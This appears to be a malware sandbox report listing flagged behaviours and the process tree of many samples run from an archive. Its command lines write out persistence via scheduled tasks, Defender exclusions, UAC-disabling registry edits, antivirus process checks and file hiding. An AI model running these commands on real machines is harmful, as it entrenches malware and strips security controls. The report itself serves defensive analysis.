Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\XClient.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\nano.exe | N/A |
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\sysnldcvmr.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\437570\Ul.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\437570\Ul.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\437570\Ul.pif | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\M5iFR20.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\437570\Ul.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\437570\Ul.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\437570\Ul.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\M5iFR20.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\FACTURA-09876RT567800.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\FACTURA-09876RT567800.exe | N/A |
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\241127-xqsswsslej_pw_infected.zip"
C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\4363463463464363463463463.exe"
C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\test-again.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\test-again.exe"
C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\nano.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\nano.exe"
C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\New Text Document mod.exe"
C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\o.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\o.exe"
C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\nothjgdwa.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\nothjgdwa.exe"
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\random.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\random.exe"
C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\client.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\client.exe"
C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\kyhjasehs.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\kyhjasehs.exe"
C:\Windows\sysnldcvmr.exe
C:\Windows\sysnldcvmr.exe
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "updateru" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\AppData\Local\updater.exe'" /f
C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\cvv.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\cvv.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "updater" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\updater.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "updateru" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\AppData\Local\updater.exe'" /rl HIGHEST /f
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vcdzh2ia\vcdzh2ia.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES40DC.tmp" "c:\Windows\System32\CSC2CA6E1F3DA984E968ECE537E1EAC7E2.TMP"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\MsChainWinSavesNet\JeuoTlIUFkP0JKjwMjJhvZCUZE7ZSPu8lUVQg7epfUxIOeMqBpEL003n4zid.vbe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LjKwmZ1Yfd.bat"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\system32\mode.com
mode 65,10
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\MsChainWinSavesNet\XeIJVXsH711dt3nzNM5xE4hYJepTgAq4zgx4OrxOJ6bMlIST.bat" "
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\FACTURA-09876RT567800.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\FACTURA-09876RT567800.exe"
C:\MsChainWinSavesNet\intosvc.exe
"C:\MsChainWinSavesNet/intosvc.exe"
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\newtpp.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\newtpp.exe"
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\JOrpebqBTx.bat"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\xxl.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\xxl.exe"
C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\l4.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\l4.exe"
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\onefile_3944_133785010779390916\l4.exe
C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\l4.exe
C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe
"C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe"
C:\Users\Admin\AppData\Local\updater.exe
"C:\Users\Admin\AppData\Local\updater.exe"
C:\Program Files (x86)\Google\Temp\explorer.exe
"C:\Program Files (x86)\Google\Temp\explorer.exe"
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Local\Temp\2968224716.exe
C:\Users\Admin\AppData\Local\Temp\2968224716.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\FACTURA-09876RT567800.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\sCmXpCl.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sCmXpCl" /XML "C:\Users\Admin\AppData\Local\Temp\tmp8529.tmp"
C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\FACTURA-09876RT567800.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\FACTURA-09876RT567800.exe"
C:\Users\Admin\AppData\Local\Temp\2880822053.exe
C:\Users\Admin\AppData\Local\Temp\2880822053.exe
C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\LukeJazz.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\LukeJazz.exe"
C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\W4KLQf7.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\W4KLQf7.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k copy Decide Decide.cmd & Decide.cmd & exit
C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\yiklfON.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\AzVRM7c.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\AzVRM7c.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DvvzTrhuYJ.bat"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\cmd.exe
cmd /c md 437570
C:\Windows\SysWOW64\findstr.exe
findstr /V "BASEDADVERTISEAFGHANISTANCONTENT" Sacramento
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Avi + Hits + Joyce + Desk + Cheers + Cleanup + Generate + Hobbies + Possible + Rover + Notifications + Unique + Helpful + Constantly + Namibia + Revolution + Transfers + Index + Colors 437570\b
C:\Users\Admin\AppData\Local\Temp\437570\Ul.pif
437570\Ul.pif 437570\b
C:\Windows\SysWOW64\timeout.exe
timeout 5
C:\Users\Admin\AppData\Local\Temp\3291433011.exe
C:\Users\Admin\AppData\Local\Temp\3291433011.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\jic4eklKP7.bat"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\AppData\Local\Temp\3532634971.exe
C:\Users\Admin\AppData\Local\Temp\3532634971.exe
C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TranscribeX.url" & echo URL="C:\Users\Admin\AppData\Local\AudioSync Innovations\TranscribeX.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TranscribeX.url" & exit
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe
"C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe"
C:\Users\Admin\AppData\Local\updater.exe
"C:\Users\Admin\AppData\Local\updater.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
C:\Program Files (x86)\Google\Temp\explorer.exe
"C:\Program Files (x86)\Google\Temp\explorer.exe"
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
C:\Users\Admin\AppData\Local\Temp\3084722593.exe
C:\Users\Admin\AppData\Local\Temp\3084722593.exe
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\Z9Pp9pM.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\Z9Pp9pM.exe"
C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\discord.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\discord.exe"
C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\mtbkkesfthae.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\mtbkkesfthae.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\LummaC2.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\LummaC2.exe"
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\svhosts.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\svhosts.exe"
C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\Client-built.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\Client-built.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\pornhub_downloader.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\pornhub_downloader.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\565.tmp\566.tmp\567.bat C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\pornhub_downloader.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\random.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\random.exe"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\khtoawdltrha.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\khtoawdltrha.exe"
C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\NoEscape.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\NoEscape.exe"
C:\Windows\system32\mshta.exe
mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\7ZO8A2~3\Files\PORNHU~1.EXE","goto :target","","runas",1)(window.close)
C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\Bloxflip%20Predictor.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\Bloxflip%20Predictor.exe"
C:\Users\Admin\AppData\Local\Temp\7ZO8A2~3\Files\PORNHU~1.EXE
"C:\Users\Admin\AppData\Local\Temp\7ZO8A2~3\Files\PORNHU~1.EXE" goto :target
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1C77.tmp\1C78.tmp\1C79.bat C:\Users\Admin\AppData\Local\Temp\7ZO8A2~3\Files\PORNHU~1.EXE goto :target"
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\C1J7SVw.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\C1J7SVw.exe"
C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\yiklfON.exe"
C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\yiklfON.exe"
C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\yiklfON.exe"
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
C:\Windows\system32\reg.exe
reg query HKEY_CLASSES_ROOT\http\shell\open\command
C:\Users\Admin\Desktop\Downloaders\4363463463464363463463463\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\Downloaders\4363463463464363463463463\4363463463464363463463463.exe"
C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\3EUEYgl.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\3EUEYgl.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\vUeiK7j9e9.bat"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\jvhcSLBvsS.bat"
C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\Dynpvoy.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\Dynpvoy.exe"
C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\M5iFR20.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\M5iFR20.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
C:\Windows\Bloxflip Predictor.exe
"C:\Windows\Bloxflip Predictor.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +h +r +s "C:\Windows\Bloxflip Predictor.exe"
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\System32\dwm.exe
C:\Windows\System32\dwm.exe
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xd8,0x10c,0x7ff99e1246f8,0x7ff99e124708,0x7ff99e124718
C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\networkmanager.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\networkmanager.exe"
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\Desktop\Downloaders\4363463463464363463463463\Files\T3.exe
"C:\Users\Admin\Desktop\Downloaders\4363463463464363463463463\Files\T3.exe"
C:\Users\Admin\Desktop\Downloaders\New Text Document mod.exse\New Text Document mod.exe
"C:\Users\Admin\Desktop\Downloaders\New Text Document mod.exse\New Text Document mod.exe"
C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\9feskIx.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\9feskIx.exe"
C:\Windows\system32\attrib.exe
attrib +s +h d:\net
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
